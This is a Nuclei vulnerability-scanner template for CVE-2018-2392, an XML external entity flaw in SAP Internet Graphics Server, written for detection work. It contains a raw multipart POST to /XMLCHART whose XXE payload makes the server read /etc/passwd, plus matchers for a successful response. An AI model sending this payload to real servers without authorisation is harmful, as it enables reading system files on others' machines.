nuclei-templates/http/cves/2018/CVE-2018-2392.yaml

101 lines
3.5 KiB
YAML

id: CVE-2018-2392
info:
name: SAP Internet Graphics Server (IGS) - XML External Entity Injection
author: _generic_human_
severity: high
description: |
SAP Internet Graphics Servers (IGS) running versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53 has two XML external entity injection (XXE) vulnerabilities within the XMLCHART page - CVE-2018-2392 and CVE-2018-2393. These vulnerabilities occur due to a lack of appropriate validation on the Extension HTML tag when submitting a POST request to the XMLCHART page to generate a new chart.
remediation: |
Apply the latest security patches and updates provided by SAP to mitigate this vulnerability. Additionally, ensure that the SAP Internet Graphics Server (IGS) is not exposed to untrusted networks or the internet.
reference:
- https://launchpad.support.sap.com/#/notes/2525222
- https://blogs.sap.com/2018/02/13/sap-security-patch-day-february-2018/
- https://www.rapid7.com/db/modules/auxiliary/admin/sap/sap_igs_xmlchart_xxe/
- https://troopers.de/troopers18/agenda/3r38lr/
- https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/admin/sap/sap_igs_xmlchart_xxe.rb
- https://nvd.nist.gov/vuln/detail/CVE-2018-2392
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
cvss-score: 7.5
cve-id: CVE-2018-2392
cwe-id: CWE-611
epss-score: 0.0032
epss-percentile: 0.67252
cpe: cpe:2.3:a:sap:internet_graphics_server:7.20:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: sap
product: internet_graphics_server
tags: cve,cve2018,sap,igs,xxe,xmlchart,msf,intrusive
http:
- raw:
- |
POST /XMLCHART HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary={{randstr_1}}
--{{randstr_1}}
Content-Disposition: form-data; name="{{randstr_2}}"; filename="{{randstr_3}}.xml"
Content-Type: application/xml
<?xml version='1.0' encoding='UTF-8'?>
<ChartData>
<Categories>
<Category>ALttP</Category>
</Categories>
<Series label="{{randstr_4}}">
<Point>
<Value type="y">12345</Value>
</Point>
</Series>
</ChartData>
--{{randstr_1}}
Content-Disposition: form-data; name="{{randstr_5}}"; filename="{{randstr_6}}.xml"
Content-Type: application/xml
<?xml version='1.0' encoding='UTF-8'?>
<!DOCTYPE Extension [<!ENTITY xxe SYSTEM "/etc/passwd">]>
<SAPChartCustomizing version="1.1">
<Elements>
<ChartElements>
<Title>
<Extension>&xxe;</Extension>
</Title>
</ChartElements>
</Elements>
</SAPChartCustomizing>
--{{randstr_1}}--
matchers-condition: and
matchers:
- type: word
part: body
words:
- Picture
- Info
- /output/
condition: and
- type: word
part: body
words:
- ImageMap
- Errors
condition: or
- type: word
part: header
words:
- text/html
- SAP Internet Graphics Server
condition: and
- type: status
status:
- 200
# file name - /etc/passwd
# digest: 4a0a00473045022010b13b20758e0d8060d8d5cd93f6d4038774b06404382fc5f77d96117c8fede00221008f8245af24fac074ca99f722ae9a86f359ec35f3e63e10b11c02434d9e8cc375:922c64590222798bb761d5b6d8e72950